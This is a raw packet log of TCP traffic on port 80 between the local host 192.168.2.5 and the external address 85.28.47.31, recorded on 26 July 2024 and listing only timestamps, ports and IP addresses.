Jul 26, 2024 20:09:11.913512945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.913530111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.141372919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.146430969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364027977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364155054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364166021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364197969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364222050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364252090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364254951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364284992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364301920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364320040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364336967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364355087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364367008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364403963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364474058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364535093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364552021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364556074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364567041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364583969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364614964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364679098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364695072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364712000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364725113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364761114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364788055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364875078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364890099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364905119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364922047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364928007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364943981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364953995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.364959002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364974976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.364990950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365000010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365006924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365036964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365062952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365402937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365416050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365430117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365453005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365453959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365469933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365482092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365533113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365556955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365572929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365586996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365602016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365602970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365648031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365731955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365757942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365777969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365816116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365878105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365894079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365907907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.365925074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.365952969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366040945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366055965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366071939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366086960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366091013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366102934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366118908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366132975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366177082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366424084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366440058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366453886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366481066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366503954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366511106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366519928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366535902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366544962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366586924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366695881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366710901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366727114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366740942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366748095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366766930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366806030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.366942883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366956949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366972923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366987944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.366995096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.367036104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.367132902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.367147923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.367183924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.367214918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371268988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371329069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371329069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371345043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371370077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371396065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371424913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371439934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371473074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371481895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371511936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371516943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371561050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371704102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371718884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371759892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371762991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371777058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371793032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371803045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371809006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.371845007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.371881962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372000933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372016907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372030973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372045040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372052908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372061014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372072935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372076988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372092009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372107983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372114897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372140884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372172117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372282028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372334003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372349024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372364998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372380018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372395992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.372399092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372419119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.372457981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.376754999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.376816988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.376828909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.376843929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.376868963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.376878023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.376899004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.376913071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.376919985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.376955032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.376992941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.377006054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.377047062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.377614021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.377669096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.377979040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.377994061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378009081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378034115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378057003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378074884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378113031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378127098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378142118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378166914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378194094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378258944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378274918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378289938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378304005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378304958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378319979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378328085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378369093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378462076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378477097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378493071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378514051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378539085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378595114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378643036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378679991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378695965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378710032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378725052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378729105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378740072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.378760099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.378799915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.388838053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.388895035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.388925076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.388940096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.389061928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.389062881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.389245987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.389261007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.389302015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.455758095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.455817938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.455843925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.455874920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.455893993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.455926895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.455948114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.455962896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.455986977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.455990076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456037998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456141949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456157923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456171989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456183910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456187963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456239939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456439972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456454992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456470013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456485033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456501007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456516981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456521034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456532955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456552029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456563950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456569910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456604004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456623077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456868887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456882000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456896067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.456913948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.456935883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.457829952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.457878113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.457909107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.457925081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.457958937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.457979918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458056927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458071947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458093882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458108902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458112955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458158016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458199978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458292007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458307028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458338022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458338976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458353996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458364010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458375931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458395958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458446980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458600998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458616018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458631039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458653927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458656073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458668947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458699942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458724976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458924055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458956957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458972931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458978891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.458987951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.458997011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459002972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459023952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459026098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459041119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459049940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459055901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459070921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459085941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459094048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459101915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459116936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459125042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459131956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459145069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459146976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459162951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459197998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459232092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459775925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459791899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.459817886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.459841967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.462650061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.462699890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.462714911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.462723970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.462774038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.462774038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.462810040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.462825060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.462841034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.462856054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.462857008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.462879896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.462932110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463212013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463227034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463241100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463258028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463263988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463279009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463294983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463300943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463346958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463370085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463413954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463422060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463429928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463445902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463459969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463468075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463483095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463499069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463505030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463514090 CEST	80	49704	85.28.47.31	192.168.2.5
